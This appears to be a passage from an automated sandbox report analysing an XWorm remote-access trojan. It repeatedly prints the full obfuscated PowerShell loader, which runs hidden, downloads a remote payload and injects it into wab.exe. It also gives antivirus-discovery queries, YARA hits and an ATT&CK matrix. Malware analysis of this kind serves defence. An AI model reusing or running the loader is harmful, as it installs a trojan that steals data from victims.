hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronInJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$shave = 1;$stikningens='sub';$stikningens+='strin';$stikningens+='g';function sideblikkets($missel){$wandoo=$missel.length-$shave;for($unisexuality=5;$unisexuality -lt $wandoo;$unisexuality+=6){$berseems+=$missel.$stikningens.invoke( $unisexuality, $shave);}$berseems;}function mekhitarist($starchflower){& ($plukningernes) ($starchflower);}$skolekommissionerne=sideblikkets 'kedelmsepteoak dezhund.ilivsflaesculbloksaco ds/ call5pred,.tizwi0liebh p ery(maalbw.ormaireklansonnedndst.ouneffwnonadsben.i obs rnst.antapert d cum1zolao0sel.k.raad 0impen;blodh n,nclw.aldyit lelndagui6midal4cicer;genne s.llex ype6 c,ys4 ord ;paras ,attr seigv trem:a pro1 dubh2varme1 glan.skand0 cucu)skatt f adrgundere outtcp,litklandooaspa / benb2 genf0outfi1crim.0af.an0amphi1warri0theca1 komm bosomfurovaifar,brboateevoco.faralkofacadxfysio/ jess1marke2ta.sh1miili. rang0store ';$forvaltningsmyndigheden=sideblikkets 'eksp uskr,bslucineprel,rskakt-yoghuap pelgfilt.e haln endet aks, ';$disgustful=sideblikkets ' hedhoverntrothet ind.p deacsblued:speac/u,clo/ traswpseudwdaanewproca.dissis ras.estjernprededrednistemaspd.fraaindrec helle a st.acentcthorao draem fed,/statip,illbrnrbeso a.oc/exactdbistnl club/postuo utscwniger9fuldf1stoic4bisto8bikag ';$fangstkvotaer=sideblikkets 're te> laur ';$plukningernes=sideblikkets 'sa,spitapisehell.xkomma ';$fertilizables='indkapslingerne140';$koden = sideblikkets ' p gledtsilc.msvbh s eeo ex.u digit%supe,alevi p .erjpstrumdbe ikastridtdat.tastand%prokl\boligtulykki forydfaxehestor,rkokko. p,stdsaturrsoutre over s,ilo&desig&rang kon re ty.ec modehsupinofre e nadintlindi ';mekhitarist (sideblikkets 'machi$parengfrokolnage obes.obformuakommul syll:aktiomcloseiforfrsbrig tdonkeesteg,rgaleo=falsi(gan.hcmislam,elatd trid busse/,iscockomme nonsu$unchak pileodoigtdyojane distntripl),rrit ');mekhitarist (sideblikkets 'adres$nonbrg tilslstillo tongbhavneaherrelprole:pinctdfaserav,sicgin,ulu haboe lapnrradiorlae,eejalteotubert drifysandwp,nfori learestalkn,pildsprobl=trekv$zooged umbrif,ftes inspgflaxwunon,psmuscatbo,caf dumpuf.renlornit.ra.pospreprps riel p.opijerbot nece(cauli$micr,funpr.afr,ngnl,berg af,us ungst sk,lk sph.vste eohaanlts,antakrepeeryaerrfo,mu),ehan ');$disgustful=$daguerreotypiens[0];$unsingularness= (sideblikkets 'dugou$ roseggreenlpr.yeocoxswb nesha hofmlnonbu: bjf.bkoordesubs,b l.mpu unknds.ggeenyserrbe.senem greevn,nsminds=flaadnhjerte unslwdoubt- whitoronkebfunktj,enopespo.vcdokumthym n tilgs fantysmagls yruptfougueklampmtottl.sondendecigek jsetpaleb.chlamwfla,kethronbkrofocpuls,lgordiiglaucebehovntandbt');$unsingularness+=$mister[1];mekhitarist ($unsingularness);mekhitarist (sideblikkets 'neg,e$radiob,ndule hjembintraus.cerdnonpeekabelrbrugen t,leeunhe.sceteo. ,omih regnesk rpahelvedga ewe udstrsupersbomae[bletr$sandsfslaveodummerventovbr ebakalfalskulktabsolndesilif,rhansopragaktieskl mam mic.ype,ronindi d p,gui fy.ig ,avnhpa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$shave = 1;$stikningens='sub';$stikningens+='strin';$stikningens+='g';function sideblikkets($missel){$wandoo=$missel.length-$shave;for($unisexuality=5;$unisexuality -lt $wandoo;$unisexuality+=6){$berseems+=$missel.$stikningens.invoke( $unisexuality, $shave);}$berseems;}function mekhitarist($starchflower){& ($plukningernes) ($starchflower);}$skolekommissionerne=sideblikkets 'kedelmsepteoak dezhund.ilivsflaesculbloksaco ds/ call5pred,.tizwi0liebh p ery(maalbw.ormaireklansonnedndst.ouneffwnonadsben.i obs rnst.antapert d cum1zolao0sel.k.raad 0impen;blodh n,nclw.aldyit lelndagui6midal4cicer;genne s.llex ype6 c,ys4 ord ;paras ,attr seigv trem:a pro1 dubh2varme1 glan.skand0 cucu)skatt f adrgundere outtcp,litklandooaspa / benb2 genf0outfi1crim.0af.an0amphi1warri0theca1 komm bosomfurovaifar,brboateevoco.faralkofacadxfysio/ jess1marke2ta.sh1miili. rang0store ';$forvaltningsmyndigheden=sideblikkets 'eksp uskr,bslucineprel,rskakt-yoghuap pelgfilt.e haln endet aks, ';$disgustful=sideblikkets ' hedhoverntrothet ind.p deacsblued:speac/u,clo/ traswpseudwdaanewproca.dissis ras.estjernprededrednistemaspd.fraaindrec helle a st.acentcthorao draem fed,/statip,illbrnrbeso a.oc/exactdbistnl club/postuo utscwniger9fuldf1stoic4bisto8bikag ';$fangstkvotaer=sideblikkets 're te> laur ';$plukningernes=sideblikkets 'sa,spitapisehell.xkomma ';$fertilizables='indkapslingerne140';$koden = sideblikkets ' p gledtsilc.msvbh s eeo ex.u digit%supe,alevi p .erjpstrumdbe ikastridtdat.tastand%prokl\boligtulykki forydfaxehestor,rkokko. p,stdsaturrsoutre over s,ilo&desig&rang kon re ty.ec modehsupinofre e nadintlindi ';mekhitarist (sideblikkets 'machi$parengfrokolnage obes.obformuakommul syll:aktiomcloseiforfrsbrig tdonkeesteg,rgaleo=falsi(gan.hcmislam,elatd trid busse/,iscockomme nonsu$unchak pileodoigtdyojane distntripl),rrit ');mekhitarist (sideblikkets 'adres$nonbrg tilslstillo tongbhavneaherrelprole:pinctdfaserav,sicgin,ulu haboe lapnrradiorlae,eejalteotubert drifysandwp,nfori learestalkn,pildsprobl=trekv$zooged umbrif,ftes inspgflaxwunon,psmuscatbo,caf dumpuf.renlornit.ra.pospreprps riel p.opijerbot nece(cauli$micr,funpr.afr,ngnl,berg af,us ungst sk,lk sph.vste eohaanlts,antakrepeeryaerrfo,mu),ehan ');$disgustful=$daguerreotypiens[0];$unsingularness= (sideblikkets 'dugou$ roseggreenlpr.yeocoxswb nesha hofmlnonbu: bjf.bkoordesubs,b l.mpu unknds.ggeenyserrbe.senem greevn,nsminds=flaadnhjerte unslwdoubt- whitoronkebfunktj,enopespo.vcdokumthym n tilgs fantysmagls yruptfougueklampmtottl.sondendecigek jsetpaleb.chlamwfla,kethronbkrofocpuls,lgordiiglaucebehovntandbt');$unsingularness+=$mister[1];mekhitarist ($unsingularness);mekhitarist (sideblikkets 'neg,e$radiob,ndule hjembintraus.cerdnonpeekabelrbrugen t,leeunhe.sceteo. ,omih regnesk rpahelvedga ewe udstrsupersbomae[bletr$sandsfslaveodummerventovbr ebakalfalskulktabsolndesilif,rhansopragaktieskl mam mic.ype,ronin
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$shave = 1;$stikningens='sub';$stikningens+='strin';$stikningens+='g';function sideblikkets($missel){$wandoo=$missel.length-$shave;for($unisexuality=5;$unisexuality -lt $wandoo;$unisexuality+=6){$berseems+=$missel.$stikningens.invoke( $unisexuality, $shave);}$berseems;}function mekhitarist($starchflower){& ($plukningernes) ($starchflower);}$skolekommissionerne=sideblikkets 'kedelmsepteoak dezhund.ilivsflaesculbloksaco ds/ call5pred,.tizwi0liebh p ery(maalbw.ormaireklansonnedndst.ouneffwnonadsben.i obs rnst.antapert d cum1zolao0sel.k.raad 0impen;blodh n,nclw.aldyit lelndagui6midal4cicer;genne s.llex ype6 c,ys4 ord ;paras ,attr seigv trem:a pro1 dubh2varme1 glan.skand0 cucu)skatt f adrgundere outtcp,litklandooaspa / benb2 genf0outfi1crim.0af.an0amphi1warri0theca1 komm bosomfurovaifar,brboateevoco.faralkofacadxfysio/ jess1marke2ta.sh1miili. rang0store ';$forvaltningsmyndigheden=sideblikkets 'eksp uskr,bslucineprel,rskakt-yoghuap pelgfilt.e haln endet aks, ';$disgustful=sideblikkets ' hedhoverntrothet ind.p deacsblued:speac/u,clo/ traswpseudwdaanewproca.dissis ras.estjernprededrednistemaspd.fraaindrec helle a st.acentcthorao draem fed,/statip,illbrnrbeso a.oc/exactdbistnl club/postuo utscwniger9fuldf1stoic4bisto8bikag ';$fangstkvotaer=sideblikkets 're te> laur ';$plukningernes=sideblikkets 'sa,spitapisehell.xkomma ';$fertilizables='indkapslingerne140';$koden = sideblikkets ' p gledtsilc.msvbh s eeo ex.u digit%supe,alevi p .erjpstrumdbe ikastridtdat.tastand%prokl\boligtulykki forydfaxehestor,rkokko. p,stdsaturrsoutre over s,ilo&desig&rang kon re ty.ec modehsupinofre e nadintlindi ';mekhitarist (sideblikkets 'machi$parengfrokolnage obes.obformuakommul syll:aktiomcloseiforfrsbrig tdonkeesteg,rgaleo=falsi(gan.hcmislam,elatd trid busse/,iscockomme nonsu$unchak pileodoigtdyojane distntripl),rrit ');mekhitarist (sideblikkets 'adres$nonbrg tilslstillo tongbhavneaherrelprole:pinctdfaserav,sicgin,ulu haboe lapnrradiorlae,eejalteotubert drifysandwp,nfori learestalkn,pildsprobl=trekv$zooged umbrif,ftes inspgflaxwunon,psmuscatbo,caf dumpuf.renlornit.ra.pospreprps riel p.opijerbot nece(cauli$micr,funpr.afr,ngnl,berg af,us ungst sk,lk sph.vste eohaanlts,antakrepeeryaerrfo,mu),ehan ');$disgustful=$daguerreotypiens[0];$unsingularness= (sideblikkets 'dugou$ roseggreenlpr.yeocoxswb nesha hofmlnonbu: bjf.bkoordesubs,b l.mpu unknds.ggeenyserrbe.senem greevn,nsminds=flaadnhjerte unslwdoubt- whitoronkebfunktj,enopespo.vcdokumthym n tilgs fantysmagls yruptfougueklampmtottl.sondendecigek jsetpaleb.chlamwfla,kethronbkrofocpuls,lgordiiglaucebehovntandbt');$unsingularness+=$mister[1];mekhitarist ($unsingularness);mekhitarist (sideblikkets 'neg,e$radiob,ndule hjembintraus.cerdnonpeekabelrbrugen t,leeunhe.sceteo. ,omih regnesk rpahelvedga ewe udstrsupersbomae[bletr$sandsfslaveodummerventovbr ebakalfalskulktabsolndesilif,rhansopragaktieskl mam mic.ype,ronindi d p,gui fy.ig ,avnhpaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$shave = 1;$stikningens='sub';$stikningens+='strin';$stikningens+='g';function sideblikkets($missel){$wandoo=$missel.length-$shave;for($unisexuality=5;$unisexuality -lt $wandoo;$unisexuality+=6){$berseems+=$missel.$stikningens.invoke( $unisexuality, $shave);}$berseems;}function mekhitarist($starchflower){& ($plukningernes) ($starchflower);}$skolekommissionerne=sideblikkets 'kedelmsepteoak dezhund.ilivsflaesculbloksaco ds/ call5pred,.tizwi0liebh p ery(maalbw.ormaireklansonnedndst.ouneffwnonadsben.i obs rnst.antapert d cum1zolao0sel.k.raad 0impen;blodh n,nclw.aldyit lelndagui6midal4cicer;genne s.llex ype6 c,ys4 ord ;paras ,attr seigv trem:a pro1 dubh2varme1 glan.skand0 cucu)skatt f adrgundere outtcp,litklandooaspa / benb2 genf0outfi1crim.0af.an0amphi1warri0theca1 komm bosomfurovaifar,brboateevoco.faralkofacadxfysio/ jess1marke2ta.sh1miili. rang0store ';$forvaltningsmyndigheden=sideblikkets 'eksp uskr,bslucineprel,rskakt-yoghuap pelgfilt.e haln endet aks, ';$disgustful=sideblikkets ' hedhoverntrothet ind.p deacsblued:speac/u,clo/ traswpseudwdaanewproca.dissis ras.estjernprededrednistemaspd.fraaindrec helle a st.acentcthorao draem fed,/statip,illbrnrbeso a.oc/exactdbistnl club/postuo utscwniger9fuldf1stoic4bisto8bikag ';$fangstkvotaer=sideblikkets 're te> laur ';$plukningernes=sideblikkets 'sa,spitapisehell.xkomma ';$fertilizables='indkapslingerne140';$koden = sideblikkets ' p gledtsilc.msvbh s eeo ex.u digit%supe,alevi p .erjpstrumdbe ikastridtdat.tastand%prokl\boligtulykki forydfaxehestor,rkokko. p,stdsaturrsoutre over s,ilo&desig&rang kon re ty.ec modehsupinofre e nadintlindi ';mekhitarist (sideblikkets 'machi$parengfrokolnage obes.obformuakommul syll:aktiomcloseiforfrsbrig tdonkeesteg,rgaleo=falsi(gan.hcmislam,elatd trid busse/,iscockomme nonsu$unchak pileodoigtdyojane distntripl),rrit ');mekhitarist (sideblikkets 'adres$nonbrg tilslstillo tongbhavneaherrelprole:pinctdfaserav,sicgin,ulu haboe lapnrradiorlae,eejalteotubert drifysandwp,nfori learestalkn,pildsprobl=trekv$zooged umbrif,ftes inspgflaxwunon,psmuscatbo,caf dumpuf.renlornit.ra.pospreprps riel p.opijerbot nece(cauli$micr,funpr.afr,ngnl,berg af,us ungst sk,lk sph.vste eohaanlts,antakrepeeryaerrfo,mu),ehan ');$disgustful=$daguerreotypiens[0];$unsingularness= (sideblikkets 'dugou$ roseggreenlpr.yeocoxswb nesha hofmlnonbu: bjf.bkoordesubs,b l.mpu unknds.ggeenyserrbe.senem greevn,nsminds=flaadnhjerte unslwdoubt- whitoronkebfunktj,enopespo.vcdokumthym n tilgs fantysmagls yruptfougueklampmtottl.sondendecigek jsetpaleb.chlamwfla,kethronbkrofocpuls,lgordiiglaucebehovntandbt');$unsingularness+=$mister[1];mekhitarist ($unsingularness);mekhitarist (sideblikkets 'neg,e$radiob,ndule hjembintraus.cerdnonpeekabelrbrugen t,leeunhe.sceteo. ,omih regnesk rpahelvedga ewe udstrsupersbomae[bletr$sandsfslaveodummerventovbr ebakalfalskulktabsolndesilif,rhansopragaktieskl mam mic.ype,roninJump to behavior
              Source: wab.exe, 0000000F.00000002.3135063808.0000000023157000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023130000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.000000002315D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 0000000F.00000002.3135063808.000000002309D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q-PING!<Xwormmm>Program Manager<Xwormmm>2019604
              Source: wab.exe, 0000000F.00000002.3135063808.0000000023157000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023130000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.000000002315D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
              Source: wab.exe, 0000000F.00000002.3135063808.0000000023157000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.000000002309D000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023130000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000F.00000002.3135063808.0000000023157000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023130000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.000000002315D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 0000000F.00000002.3135063808.000000002309D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q-PING!<Xwormmm>Program Manager<Xwormmm>2019604Te
              Source: wab.exe, 0000000F.00000002.3135063808.000000002309D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2019604
              Source: wab.exe, 0000000F.00000002.3135063808.0000000023157000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.000000002309D000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023130000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.23.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.23.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.23.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.23.drBinary or memory string: MsMpEng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8172, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8172, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		112
              Process Injection              		1
              Masquerading              		OS Credential Dumping31
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)41
              Virtualization/Sandbox Evasion              		Security Account Manager41
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
